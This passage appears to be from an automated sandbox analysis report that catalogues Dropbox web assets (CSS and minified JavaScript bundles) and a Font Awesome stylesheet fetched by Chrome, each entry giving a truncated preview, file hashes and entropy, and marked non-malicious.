                                                    Preview:./* -- typescript/component_libraries/pro-ui/src/components/branding/background/index.web.css */..branding-background{height:100%;overflow:hidden;position:relative;width:100%}.branding-background-thumbnail{display:inline-block;height:36px;width:36px}.branding-background--image,.branding-background-thumbnail{background-position:50%;background-repeat:no-repeat;background-size:cover}.branding-background__video{height:400%;left:0;position:absolute;top:-150%;width:100%}./* -- typescript/component_libraries/pro-ui/src/components/branding/branding_block/index.web.css */.:root{--branding-folder-preview-height:220px}.branding-folder-preview{align-items:center;background-size:cover;display:flex;height:var(--branding-folder-preview-height);justify-content:center;overflow:hidden;position:relative}.branding-folder-logo{max-height:100%;max-width:var(--branding-folder-preview-height)}.video{height:100%;object-fit:cover;position:absolute;width:100%}./* -- typescript/component_libraries/pro-ui/src/comp
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (6977)
                                                    Category:downloaded
                                                    Size (bytes):6978
                                                    Entropy (8bit):4.831974926409326
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D8D742D50E72BE3B93DD10E6631622B3
                                                    SHA1:9F795BC4B8CD7A9D68346F37CA5682A6DB4CAD2C
                                                    SHA-256:4CBB94D3E941FA9B755F9FD99CE2F2CCA12B62AFF0903AF8754D43649AEF65C0
                                                    SHA-512:4F36039DE064E436F663AD3ADBB57AF507BBD2EE20F2425F152D97BF98FA52F94CC9071C718E4D2A52CFAD55F1C6D0DF23D9C4A3171B910A31CC4BDD35D2F079
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/react_title_bar-vfl2NdC1Q.css
                                                    Preview:.ax-visually-hidden{position:absolute !important;border:0 !important;clip:rect(0, 0, 0, 0) !important;width:1px !important;height:1px !important;margin:-1px !important;padding:0 !important;overflow:hidden !important}.ax-focusable:focus,.ax-focusable.is-focused{box-shadow:0 0 0 2px #a0d1fa;outline:none}.ax-focusable-inline:focus,.ax-focusable-inline.is-focused{text-decoration:underline}.ax-focusable--rounded:focus,.ax-focusable--rounded.is-focused{border-radius:3px;box-shadow:0 0 0 2px #a0d1fa;outline:none}.react-title-bar{position:relative;display:flex;justify-content:space-between;align-items:center;height:63px;box-sizing:border-box;background:var(--dig-color__background__base);border-bottom:1px solid var(--dig-color__border__base);width:100%}@media only screen and (min-width: 1025px){.react-title-bar{padding:auto;width:100%}}.react-title-bar .react-title-bar--title-bubble{display:flex}.react-title-bar__title-wrap{display:flex;flex-wrap:nowrap;align-items:center;height:inherit;flex-gr
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3989)
                                                    Category:dropped
                                                    Size (bytes):4070
                                                    Entropy (8bit):5.0990371709261035
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E76EA6A9099ED6D4F16BC488D01A259D
                                                    SHA1:98A7840013A4D4894C2BD03735058B75E6ECC6F7
                                                    SHA-256:4C17CDAFFA584730B82759E3E306355A7BF569F5E2C66D8D0A94DD8D60B6718B
                                                    SHA-512:7C1EC2CC5DC67A84233105FDDBF1503D3077307040B705B6D642385F8E3238735DC2FF71ECB45887B36E70DE1729D7ABE4EFB64F226201D9D56BAFDC68DAA742
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(t,e){"use strict";e.injectInternalStyle("/static/metaserver/static/js/file_viewer/title_bar/title_bar_right_section.module.out-vflFwZKYX.css",(t=>"._titleBarRightSection_1rs6t_1{align-items:flex-end;display:flex;flex-direction:column;justify-content:flex-start;margin-left:var(--dig-spacing__macro__large)}._titleBarRightSectionTopRow_1rs6t_9{align-items:center;display:flex}._titleBarRightSection_1rs6t_1>:not(:last-child){margin-bottom:var(--dig-spacing__micro__small)}._editorActions_1rs6t_18{gap:var(--dig-spacing__micro__large)}._editorActions_1rs6t_18,._titleBarActionButtons_1rs6t_24{align-items:center;display:flex}._titleBarActionButtons_1rs6t_24>*{margin-left:0}._titleBarFileCounterContainer_1rs6t_33{margin:0;white-space:nowrap}._titleBarFileCounter_1rs6t_33{color:var(--dig-color__text__subtle);margin:0 var(--dig-spacing__micro__xsmall)}._separator_1rs6t_43{border-right:1px solid var(--dig-color__border__subtle);he
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3253)
                                                    Category:dropped
                                                    Size (bytes):3346
                                                    Entropy (8bit):5.282412069678527
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:89C33EAB8CD8D059C105865FCF57DCBB
                                                    SHA1:533CD8360FAA41603CCE4651131811C39F4A38D1
                                                    SHA-256:5ED404F7C770ACFF8EE4905C0F11FEE38F1D6F03A182F7020A8C7734748BD1FA
                                                    SHA-512:DC7EE031AF63981CD4122DB0E98E2B8B5C342A35E9EFF91CEF1B4A80927EBCDE585661922FEB4CAA8E5D1B6A5895A20EDCA81E43D42D456589DA0BD1303493DA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_integrations_hellosign_deep_integration_constants"],(function(e,t,n){"use strict";const i=async e=>{const{eventState:n,actionSurface:i,actionElement:o,requestedAccessLevel:l,content:a,contentAction:s,isSm24:r}=e,d=((e,n,i,o,l,a,s)=>{const r=null==l?void 0:l.isDir,d=t.getSharedLinkRequestedAccessLevelFromString(i),c=r?t.getFolderTypeFromString(t.FILE_TYPE_TO_FOLDER_TYPE[null==l?void 0:l.type]):void 0,v=null==l?void 0:l.nsId,u=null==l?void 0:l.fileId,h=r||null==l?void 0:l.ext;return{eventState:e,actionSurface:n,actionElement:o,contentAction:a?t.getContentActionFromString(a):void 0,folderType:c,sharedLinkRequestedAccessLevel:d,isDir:r,includeNsCreation:!1,nsId:v,hasCachedLink:!1,contentIdentifier:u,fileExtension:h,shareModalType:s?t.getShareModalTypeFromString("sm24"):void 0}})(n,i,l,o,a,s,r);let c;if("success"===n&&e.metadata&&e.httpCode){const{metadata:n,httpCode:i}=e;c=await(async(e,n)=>{var i;const o={},l=null==e?void 0:e
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (60439), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):88629
                                                    Entropy (8bit):5.875805077246424
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F6F9537C88A54E8B5DA6E94B9D8187BB
                                                    SHA1:200E5C1B6740EC3C5ABED7613876A62734F2EFC1
                                                    SHA-256:FD277E02FFBA91928F522256C9FB2B050B6035BCDA21840CDECE71AD81EC5819
                                                    SHA-512:3251BE5781788918D6F102C35DADB1D84D0AB13CC092A3E39634AAE0C41D6D55E0BB6DE165FAE3B761DACBDB5B1FE8AE1C507C465C41D80D1BA71EBCF5F35FFA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_file_viewer_hooks_usePrevious","./c_core_utils_is_text_preview_on","./c_core_logging_actions","./c_file_viewer_hooks_lifecycle_logging","./c_file_viewer_keyboard_bindings","./c_file_viewer_loading_indicator","./c_core_data_ui","./c_core_utils_kmp_search","./c_lodash","./c_dig-icons_assets_ui-icon_line_upload","./c_file_viewer_comments2_utils","./c_queries_utils_preview_metadata","./c_core_utils_browser_detection","./e_core_exception","./c_react-redux_hooks_useDispatch","./c_branding_shared_previews_file_viewer_preview","./c_file_viewer_ui_header","./e_data_modules_stormcrow","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/j
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (52646)
                                                    Category:downloaded
                                                    Size (bytes):52647
                                                    Entropy (8bit):4.860734519870417
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:27352512CAB4CE48D581209F45B3E18A
                                                    SHA1:CA3030AB17DED5DF33BD23254C923EFEF6150389
                                                    SHA-256:A24DA0252A412F8322EC1A5A5499A7EF2AEA306999BEAD091D286256A4F197DA
                                                    SHA-512:C09748F000D8EBF87F287E613E22A3E8274793A6F4F2E1111A13DE27C6F65AE1995E4409E65E4C75843918806DAB955D61F1362B7974C8231181CEDA9336DDF0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflJzUlEs.css
                                                    Preview:.o-scrollable{overflow:auto;overflow-y:scroll;-ms-overflow-style:-ms-autohiding-scrollbar}.o-scrollable--x-only{overflow-x:scroll;overflow-y:hidden}.o-scrollable--y-only{overflow-x:hidden;overflow-y:scroll}button.c-borderless-button{background-color:inherit;cursor:pointer;margin:0;padding:0}button.c-borderless-button:focus{outline:none;box-shadow:0 0 0 2px #cce6fa;border-radius:3px}button.c-borderless-button:disabled{cursor:not-allowed;opacity:0.5}.db-modal{overflow:hidden}.db-modal-wrapper .db-modal:focus{outline:none}.tabbing .db-modal-wrapper .db-modal:focus{box-shadow:0 0 0 2px #a0d1fa}@keyframes fade-in{0%{opacity:0;transform:translate(0, -10px)}100%{opacity:1}}.unified-share-modal{animation-name:fade-in;animation-duration:0.3s;animation-iteration-count:1;animation-timing-function:ease-in-out;width:540px;display:flex;flex-direction:column;font-size:12px;margin-bottom:160px;overflow:hidden}@media (max-width: 540px){.unified-share-modal{width:100%}}.unified-share-modal *{box-sizing:
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:troff or preprocessor input, ASCII text, with very long lines (372)
                                                    Category:downloaded
                                                    Size (bytes):37414
                                                    Entropy (8bit):4.82325822639402
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C495654869785BC3DF60216616814AD1
                                                    SHA1:0140952C64E3F2B74EF64E050F2FE86EAB6624C8
                                                    SHA-256:36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
                                                    SHA-512:E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
                                                    Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./* makes the font 33% larger relative to the icon container */..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1331)
                                                    Category:dropped
                                                    Size (bytes):1397
                                                    Entropy (8bit):5.0371618255720065
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8D8A7A11A580E440757414BA9937C431
                                                    SHA1:5A17E447C1DA90FF35C85D281691F8750924EA38
                                                    SHA-256:561C3FDCF438694F8ABD4BFE4A10B378234E857F29EA17FFB8B3CF79CFE8871F
                                                    SHA-512:E53DFE171D8357542F1D1B69EB47C00702E5886C47DC1FDB8B54A8B73F8932C4E34C8BDDD8276F653D6B1DD7723A49265FACDD26507D910F0C471C5317EAE990
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","react-dom","./e_edison","./c_ts_utils","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_lodash"],(function(e,t,o,n,r,d,c,i,l,a){"use strict";function u(e){return e&&e.__esModule?e:{default:e}}var s=u(o),_=u(n);t.render=function(t,o=!1,n="",i=!1){if(!t.RootComponent){const e=c.getDebugPanelInfo();throw new Error(`Module '${null==e?void 0:e.entryPointModuleName}' does not export a React component named RootComponent.`)}let l={};if(n&&n.length>0){const{encodedProto:e}=d.unmarshalProto(n,r.InitProps);l={encodedProto:e}}const a=i?s.default.createElement(s.default.StrictMode,null,s.default.createElement(t.RootComponent,l)):s.default.createElement(t.RootComponent,l),u="root";let f=document.getElementById(u);null===f&&(f=document.createElement("div"),f.id=u,document.body.appendChild(f));const m=r.Edison.getMetrics();m.recordRenderStarted(),s.default.version.startsWith("18")?new Promis
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3594)
                                                    Category:dropped
                                                    Size (bytes):3669
                                                    Entropy (8bit):4.903060868312544
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:750FB7830622ACB4B9704B2863060F3B
                                                    SHA1:AA877BC740F4A944953796206615AED7E73CD6F1
                                                    SHA-256:15F9433D020CCF1AD117B7DBE546FD19C35A1A833E2BA728096823FF6B449FDD
                                                    SHA-512:E3AFBB8134040C02310D6D825F7C9BE4415E8C7FBD022262F820CD3EC0818CFF610D19D76B23E7F12AA28DF6F95EC005D676708EE7E90BA61BC30D00C3149F7E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,l){"use strict";function c(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var t=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(l,c,t.get?t:{enumerable:!0,get:function(){return e[c]}})}})),l.default=e,Object.freeze(l)}var t=c(l);e.BugLine=e=>t.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},t.createElement("path",{d:"M16.5 13.5h2V12h-2V9H15v-.25a3.324 3.324 0 0 0-.769-2.284l.69-1.38-1.342-.671-.629 1.256a4.316 4.316 0 0 0-2.4 0l-.629-1.256-1.342.67.69 1.38A3.325 3.325 0 0 0 8.5 8.75V9H7v3H5v1.5h2v1.25c0 .1.007.191.011.287l-1.943.486.364 1.455 1.822-.456C7.84 18.413 9.428 19.5 11.75 19.5c2.303 0 3.883-1.068 4.481-2.93l1.856.412.326-1.464-1.926-.428c.006-.113.013-.224.013-.34V13.5ZM10 8.75C10 7.54 10.54 7 11.75 7s1.75.54 1.75 1.75V9H10v-.25Zm5 6c0 2.126-1.124 3.25-3.25 3.25S8.5 16.876 8.5 14.75V10.5H15v4.25Z",fill:"currentColor",vectorEffect:"non-scaling-
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5188)
                                                    Category:downloaded
                                                    Size (bytes):5286
                                                    Entropy (8bit):5.334274326979917
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AA2C11644E616A63BEF662600B2B6947
                                                    SHA1:E19522A6DA9095518FCABAE26F782B5847A4FA6A
                                                    SHA-256:45B26DDDC37B12FD068B6A522FD38DB7C57A6689BDE1C1C93691024551F5E37F
                                                    SHA-512:493D8CAE7CCD2EEF976420371F2B31900C4074700B5424A8E5107B6B190C58D74BB2A5DF504FD2F9F554B7061C9FD348CC4C81501D17F60862DC10F3311E078D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_title_bar_dropdowns_titlebar_view_dropdown.after-display-vflqiwRZE.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_action_plugins_comment_action_button","./c_action_bar_action_bar_strings","./c_file_viewer_api_navigation","./c_dig-icons_assets_ui-icon_line_member-transfer","./c_action_plugins_conversion_action_conditions","./c_dig-icons_assets_ui-icon_line_hide","./c_dig-illustrations_spot_passcode-lock","./c_core_i18n","./c_pap-events_sign_save_signature_doc","./c_action_plugins_transcript_action_utils","./c_core_data_ui","./c_dig-icons_assets_ui-icon_line_undo","./c_file_viewer_components_titlebar_menu_content","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./e_core_exception","./c_lodash","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_file_viewer_action_plugins_t
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8486)
                                                    Category:dropped
                                                    Size (bytes):8548
                                                    Entropy (8bit):5.087193614672353
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:98A031F28D8561BF487BF0DB5C372325
                                                    SHA1:F287F9705320EAFC4082FCBFBC9A93E39B2019F9
                                                    SHA-256:4C42E5EB6D2C9A5CB70DBD45FE9849E0DF812570538FE908E01D54D42E1DFB11
                                                    SHA-512:8B4AD4ED5D66EF74782D69415C21EB9AED307C43A0F3B7F6C75B69C2CF5C928D106C90FA7E744C8EEE99613E973E8176AABCB98450A65629B420DBBD1535D25C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_ts_utils","./e_core_exception","./e_edison","./c_api_v2_routes_folders_info_provider","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_src_sink_index"],(function(e,i,s,t,_,r,o,n){"use strict";class a{constructor(e){this.category="web-user-action",this.session_id=null,this.user_id=null,this.team_id=null,this.on_maestro=!0,this.extra={},this.ua_browser_name=null,this.ua_browser_version=null,this.ua_dist_name=null,this.ua_dist_version=null,this.ua_os_name=null,this.ua_os_version=null,this.authed_user_ids=null,this.identity_gid=null,this.anon_ip=null,this.active_user_id=null,this.team_type=null,this.locale_browser_header=null,this.locale_user_selected=null,this.referrer=null,this.user_agent=null,this.country=null,e.hasOwnProperty("event_name")&&void 0!==e.event_name&&(this.event_name=e.event_name),e.hasOwnProperty("session_id")&&void 0!==e.session_id&&(this.session_id=e.session_id),e.hasOwnProperty("source")&&void 0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2835)
                                                    Category:downloaded
                                                    Size (bytes):2913
                                                    Entropy (8bit):5.072653939510458
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9E93559647C14D38AEDA0DF63D8992B9
                                                    SHA1:543513816840016DFC28562E52AC4983D9575D6F
                                                    SHA-256:68A6FE2EA0F60552D053633F8372C84D9072D46B5215569446D202DB1D1680FD
                                                    SHA-512:656FA2ADA9250DF789F655DD45D66FB2BFBF38C09F48C60E1E6A0B0EB79E3D89F70069BE3A2231A38E5663124AD2C1C7D25F742C5F1C4B69667A5293CDFC5A6F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_user_education_user_education_client-vflnpNVlk.js
                                                    Preview:define(["exports","./c_src_sink_index","./c_onboarding_survey_lib_oa_pulsar_campaigns"],(function(e,t,s){"use strict";window.ensemble&&!window.ensemble.eventEmitter&&(window.ensemble.eventEmitter=new t.EventEmitter);const n=window.ensemble&&window.ensemble.eventEmitter?window.ensemble.eventEmitter:new t.EventEmitter;const a=new class{constructor(){this.controllerReady=!1,this.eventQueue=[],this.stepCallback={},this.globalCallbacks=[],this.on(s.UEStateChannel,this.handleUpdate,this)}init(){this._sendEvent({containerName:"UEClient",name:s.UEEventName.Subscribe,data:{}})}on(e,t,s){n.on(e,t,s)}removeListener(e,t,s){n.removeListener(e,t,s)}send(e,t){this._isUserEducationDisabled()||n.emit(e,t)}sendEvent(e,t,s={}){if(this._isUserEducationDisabled())return;const n={containerName:e,name:t,data:s};this.controllerReady?this._sendEvent(n):this.eventQueue.push(n)}_sendEvent(e){this._isUserEducationDisabled()||(this._shouldSendEventAsynchronously()?setTimeout((()=>this.send(s.UEEventChannel,e)),0):
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (21223)
                                                    Category:dropped
                                                    Size (bytes):21284
                                                    Entropy (8bit):5.45300161929382
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:64CB87013CC1847DE63F7F6E75B57DEE
                                                    SHA1:6B064D693BE035595CE4974B8380D74B675CBB74
                                                    SHA-256:9F7D58A3575925DBF3697B8EF1C39270AB7F767EC71CDF09BC30C63C61819BEA
                                                    SHA-512:735CAD47DC3DEDF34FBF4B5805EC2A26AC73535123EA79E89EF61C260395DE5F4A2688F992480BA4D60E523C11553F5DD6E45AB4B839050E45D8D4133745809A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_reduxjs_toolkit_redux-toolkit","./c_ts_utils","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./e_core_exception","./c_lodash","./c_flux_dispatcher","./c_api_v2_routes_folders_info_provider","./c_active_user"],(function(e,t,r,i,a,s,n,o,d,c){"use strict";var _="NOT_FOUND";var E=function(e,t){return e===t};function l(e,t){var r,i,a="object"==typeof t?t:{equalityCheck:t},s=a.equalityCheck,n=void 0===s?E:s,o=a.maxSize,d=void 0===o?1:o,c=a.resultEqualityCheck,l=function(e){return function(t,r){if(null===t||null===r||t.length!==r.length)return!1;for(var i=t.length,a=0;a<i;a++)if(!e(t[a],r[a]))return!1;return!0}}(n),u=1===d?(r=l,{get:function(e){return i&&r(i.key,e)?i.value:_},put:function(e,t){i={key:e,value:t}},getEntries:function(){return i?[i]:[]},clear:function(){i=void 0}}):function(e,t){var r=[];function i(e){var i=r.findIndex((function(r){return t(e,r.key)}));if(i>-1){var a=r[i];return i>0&&(r.splice(i,1),r.unshift(a)),a.value}return _}return{get:i,put
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (673)
                                                    Category:downloaded
                                                    Size (bytes):735
                                                    Entropy (8bit):5.070041136904921
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:33DF5D12B388AEDB89F684A961ED7B91
                                                    SHA1:93B7DFD28A9572F274E7FF53F4D9B865133260D6
                                                    SHA-256:9204D09B6E2DE3FEDAD6243A3AF97A9EFD515104B7FDCBFC067B7C5BAC228C1E
                                                    SHA-512:C193C2DD74FEEB1263CD4044A9C9C04514C4C50180F82C321B4573F15D8A53704ABE8E1E62E84DDF2229D9047D77E2823E462C743743BF08C38E1B4F2FE03B32
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_edison_cookies_check-vflM99dEr.js
                                                    Preview:define(["exports","./c_core_notify","./c_ts_utils","./c_core_i18n","react-dom","react","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_lodash","./c_src_sink_index","metaserver/static/js/langpack"],(function(e,s,t,o,c,i,n,r,_,a,d,u,f){"use strict";e.ensureCookiesAreEnabled=function(){return!!t.Cookies.are_enabled()||(window===window.top&&s.require_css("/static/metaserver/static/css/notify-vfl4oJv2S.css").then((()=>{s.Notify.error(o.intl.formatMessage({id:"G39vbK",defaultMessage:"Unable to access strictly necessary cookies. The website might not function correctly."}))})),!1)}}));.//# sourceMappingURL=c_edison_cookies_check.js-vflpo1qRg.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):83239
                                                    Entropy (8bit):5.326639790352725
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D861E27C297D173C6CBD4C98848282C6
                                                    SHA1:108D1A8CCB7C2A975F526E2B9EE10BD106BB1803
                                                    SHA-256:E7FCC5020C4BA427B548BF259DB9EC8E4870F79B3F1BE13B8D05AD75D9DAA913
                                                    SHA-512:595209920AA321D6495BE5C41348536198ED0ED314B2DAF2748117454793191A4EBA86A490F69D255D6951E0BF568D884E1A4BF221DA85BC176C8EECC4B220BE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_title_bar_title_bar_pass_ui-vfl2GHifC.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_utils_browser_detection","./c_core_utils_uuid","./e_core_exception","./c_viewer_hoc","./c_core_i18n","./c_flux_dispatcher","./c_lodash","./e_data_modules_stormcrow","./c_api_v2_routes_folders_info_provider","./c_flux_action_type","./c_flux_base_store","./c_sharing_content_info","./c_cloud_docs_constants","./c_sharing_low_distraction_view_gating_utils","./c_file_viewer_common_share_helpers"],(function(e,t,s,n,i,a,r,o,c,_,l,d,u,h,E,S,p,m){"use strict";function f(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(s){if("default"!==s){var n=Object.getOwnPropertyDescriptor(e,s);Object.defineProperty(t,s,n.get?n:{enumerable:!0,get:function(){return e[s]}})}})),t.default=e,Object.freeze(t)}var I=f(t);function g(e){return e.ns("seen_state")}s.injectInternalStyle("/static/metaserver/static/js/file_viewer/title_bar/title_bar_pass_ui.module.out-vflMh8hJr.css",(e=>"._pass_1
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1966)
                                                    Category:downloaded
                                                    Size (bytes):2044
                                                    Entropy (8bit):5.157652602150118
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C4AD09C1D78FD79672644E3DFC4EB974
                                                    SHA1:118013CEE8C5BDF751037CFC6A46EBF0952F4D9D
                                                    SHA-256:E86E178D66DE50ED272A2D359332D826862598E4D8DEDEDC3D96478DE7AFE5E6
                                                    SHA-512:7EFB8328E8F1FF8C4398B7728F10DC6C7766240943A3699D7AE3A742D1B66DF2EC65AFAB8614A028D70C931472826803E0FA4EAF647CF7F621D8EDA004671110
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_rewind-vflxK0Jwd.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var r=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,r.get?r:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var r=c(t);e.GlobeLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M11.75 4C6.535 4 4 6.535 4 11.75s2.535 7.75 7.75 7.75 7.75-2.535 7.75-7.75S16.965 4 11.75 4Zm5.714 4.5H14.87a9.237 9.237 0 0 0-.623-2.711A4.454 4.454 0 0 1 17.463 8.5ZM18 11.75c.002.586-.042 1.171-.133 1.75H14.97c.022-.579.03-1.167.03-1.75s-.008-1.171-.03-1.75h2.897c.09.579.135 1.164.133 1.75ZM11.75 18c-.616 0-1.3-.41-1.598-3h3.196c-.298 2.59-.982 3-1.598 3Zm-1.712-4.5c-.024-.524-.038-1.1-.038-1.75 0-.65.014-1.226.038-1.75h3.424c.024.524.038 1.1.038 1.75 0 .65-.014 1.226-.038 1.75h-3.424ZM5.5 11.75c-.002-.586.042-1.171.133-1.75H8.53c-.022
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (15811)
                                                    Category:dropped
                                                    Size (bytes):15866
                                                    Entropy (8bit):5.1405261875550226
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1A0A18636723E2A433FC34CA3509C940
                                                    SHA1:0E7DED69429008C6B5332B88AD1290D88AB20D16
                                                    SHA-256:96FBAD8819A78B5A1274D42EDF7FD2548395E7279870DBE8BDB823BF0B9649FD
                                                    SHA-512:0394F33D27EAF48D714701CA228793BC72F66CA4E877821B753D4BAF8DA634D79607664B46FEA2E16744A2CDCB6AD92A2BDA41E1D0020BF5E54FCEAE616F47E6
                                                    Malicious:false
                                                    Reputation:unknown
